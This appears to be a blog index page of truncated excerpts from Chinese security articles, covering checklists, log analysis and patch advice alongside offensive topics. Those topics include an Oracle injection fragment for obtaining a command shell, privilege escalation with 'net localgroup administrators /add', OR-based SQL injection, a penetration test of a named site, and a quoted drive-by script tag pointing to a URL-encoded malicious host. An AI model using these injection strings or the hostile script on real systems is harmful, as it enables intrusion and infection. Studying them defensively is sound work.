作者:charlee fcicq最近在IPA上看到一篇安全相关的文章, 它的最末尾有个checklist,于是催我把它翻译了。前几天比较忙,周末没什么事儿了,就翻译一下吧。 原文的标题是如何让网站更安全。 这里仅翻译文章最后的一个checklist。 2008/4/20更新:fcicq倒是神速啊,马上就把具体的应用策略扔出来了 参考:PHP 实践 Security Checklist
犀利的 oracle 注入技术 linx 2008.1.12 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EX
在asp中使用正则表达式剔除html标记 <% Function RemoveHTML(str) Dim objRegExp, Match, Matches Set objRegExp = New Regexp objRegExp.IgnoreCase = True objRegExp.Global = True '取闭合的<> objRegExp.Pattern = "<
涉密信息系统安全保密建设探讨 许正虎 李一峰 陈 强 中国电子科技集团公司第二十八研究所 摘 要 本文从涉密信息系统安全保密建设规划设计、技术体系以及运行管理等三个方面对涉密信息系统安全保密建设技术要点进行了分析。 关键词 涉密信息系统 安全保密 系统建设 1 引言 当前,随着信息技术的发
DB_OWNER权限备份hta到启动项提权的小工具。
来源:80sec 漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。 漏洞厂商:[url]http://www.ipmotor.com/[/url]
通过mysql对淮北生活通网站的一次渗透测试 Simeon【antian365.com】本文已投黑客手册杂志 转载文章请注明来自antian365.com网站! 本次渗透测试是随机性的,原因来自鬼仔的blog,在鬼仔的blog上面发表了一篇文章,其中提供了一款MySQLhack的工具,声称只要获取了Mysql数据库的用户名
作者: 陈将所谓安全审计,是指评估企业安全风险以及如何应对风险措施的一个过程。这是一个人为的过程,有一群拥有相关计算机专业技能和商业知识的审计人员操作进行。作为审计的一个过程,审计人员会询问关键职员,实施漏洞评估,给现有的安全政策和控制造册,检查IT资产。很多情况下,审计很大程度上有赖于技术工具。安全审计的焦点问题如下:1. 密码是否牢靠?2. 网络是否有访问控制清单?3. 访问日志是否记录了访问
2K XP guest提权的方法(已测试可以用) 大家知道,在Windows 2000/XP 中,如果你是管理员,就算不知道其他用户(管理员)的密码,还是可以用 Net User 帐户 密码 更改其密码。据说MS是为了用 户的方便(如用户忘记密码),此外,用户还可以用Net Localgroup Administrators帐户 /add 命令来将帐户添加到管理员组。 但是,如果你不是管理员,
微软最新GDI漏洞MS08-052安全解决方案 Simeon 微软于九月九日凌晨爆出有史以来最大的安全漏洞MS08-052,通过该漏洞,攻击者可以将木马藏于图片中,网民无论是通过浏览器浏览、还是用各种看图软件打开、或者在即时聊天窗口、电子邮件、Office文档里查看这些图片,只要看了就会感染木马!哪怕只是看了一个QQ表情!其危害程度远远超过以往微软公布过的任何安全漏洞。 (一)什么是GDI+漏洞
September Patch To Fix Windows GDI Exploit and More by Jabulani LeffallSeptember 9, 2008 Redmond on Tuesday rolled out four critical fixes, as expected, for as many as eight remote code execution expl
近日,微软爆出有史以来最大的安全漏洞。通过该漏洞,攻击者可以将木马藏于图片中,网民无论是通过浏览器浏览、还是用各种看图软件打开、或者在即时聊天窗口、电子邮件、Office文档里查看这些图片,只要看了就会中招!哪怕只是看了一个QQ表情!其危害程度远远超过以往微软公布过的任何安全漏洞。 针对这一突发情况,奇虎360迅速组织力量进行研发,在第一时间独家推出了完整的解决方案,能够同时修补window
目前网络上相当受欢迎的网路路迹追踪软件 NeoTraceProTrial325
1.,访问控制列表)、防火墙、入侵检测甚至防毒的功能,网络的安全真的需要“武装到牙齿”吗?买三层交换机做虚拟网络,就比普通网络更安全吗??? 实行安全措施之前的ALE是年损失期望值。ALE),ARO。因此安全投入应当跟保护的资产有关系,看看你这个网络有多少重要数据需要保护,如果这些数据损失了,会对公司当前业务以及公司长期运行带来多大的损失。通过这个来衡量需要武装的安全投入,比如美国国防部吧,那些地
服务器日志如何查看 一、利用Windows自带的防火墙日志检测入侵下面是一条防火墙日志记录2005-01-1300:35:04OPENTCP61.145.129.13364.233.189.1044959802005-01-1300:35:04:表示记录的日期时间OPEN:表示打开连接;如果此处为Close表示关闭连接TCP:表示使用的协议是Tcp61.145.129.133
怎样查看服务器日志 -------------------------------------------------------------------------------- 查看服务器日志文件的作用 网站服务器日志记录了web服务器接收处理请求以及运行时错误等各种原始信息。通 过对日志进行统计、分析、综合,就能有效地掌握服务器的运行状况,发现和排除错误原 因、了解客户访问分布等
web 服务器日志分析 什么 awstat 或者其它 google analytics,yahoo 统计之类都可以完成站点分析,但为什么不用 www 自己就有的日志呢?从 查询并禁止apache中异常访问量的用户 看到这个简单的办法,赶紧从 win2k3 上拿下日志,在 ubuntu 终端中分析了一下,这下看得就很清楚了… windows 2003 iis 日志目录为 windowssystem
神秘提权超强版冷枫去后门webshell文件留有后门程序,本人获取了网上流传的一个版本,通过分析,该webshell文件留有一个挂马后门,用户在使用后,会自动在当前网站的index、user、list、main、等文件中自动插入挂马代码。包括js文件文件。在使用时一定要小心。
我在入侵过程中注意到的细节(一)lcx 细节决定成败,不但对于写程序、渗透入侵甚至人生都是如此。谈人生就有点深奥了,还是来谈谈入侵吧。记得很久前有一位同事,注入的时候,在sa权限什么命令都能执行的情况下竟然入侵花费了三天左右的时间,为什么呢?这是因为他在NBSI下输了个time命令,想看下服务器的时间,结果命令无法应答,注入点宕在哪儿了,再也没办法执行其它命令了,直到服务器重启。有的写的不好的木
作者:lcx来源:vbs小铺 《黑客手册200802》我在入侵过程中注意到的细节(二)lcx 上期我写的基本都是在入侵内网过程中要注意到的细节,不过现在流行的毕竟是注入了。现在常规注入针对的也就是asp、php、jsp、cfm、 cgi等的动态脚本。针对各种脚本的话,如果注意一些细节,像构造特殊字符,也会起到很奇妙的作用。像最早的%5c暴库、%00截断都是轰动一时的漏洞。这些漏洞被发现
作者:陆羽 记得一年前火狐有一位朋友问,如果一个站过滤了and和"'"的话,改怎么注入啊?当时我随口说了句"or注入",后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。我们用雷霆购物系统做or注入演示。我们先用or 1=
挂马者地址: <script src=http://%61%76%65%31%2E%63%6E></script> 解码后的地址为:[url]http://ave1.cn[/url] 查看IP地址: C:\Documents and Settings\sdf>ping [url]www.ave1.com[/url] Pinging [url]www.
51cto blog友情链接模块存在脚本问题,在添加的文字中如果包含有“‘”时会出现“/”,估计是过滤时没有过滤严格,而且会删除掉以前添加的友情链接。请技术人员看到后彻底解决该问题。
在计算机杀毒软件目录中新建一个文件即可。代码正在编写中。哈哈。很简单,也很有效。
testtest
矛与盾的较量——网络攻击和防火墙详解 随着网络的普及,网络安全已经成为我们每个与网络有关的人的日常生活中最为关心问题之一。如何维护自己的网络安全?如何将风险降到最小?我的信息是否被别人看见?我的电脑或者网络最近是不是被入侵了?我有了防火墙,是不是上网就安全了?等等一系列的问题,都成为我们要关注的问题。与上个世纪90年代中期相比,病毒技术随着计算机技术的发展已经有了很大的发展,从传
最近遇到一种情况,在远程计算机上明明开放了3389端口,且通过查询命令知道该主机确认提供了3389端口服务。该远程计算机具有独立IP地址。遇到该问题后,采取了以下方式: (1)寻找附近或者IP地址同一个范围的计算机进行登录。试验结果表明该方式不行。 (2)适用端口转发,通过适用端口转化程序进行端口转化,结果还是不行。 (3)适用代理程序,在远程计算机安装代理程序后还
<iframe scrolling="no" frameborder="0" marginheight="0" marginwidth="0" width="150" height="150" src="
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号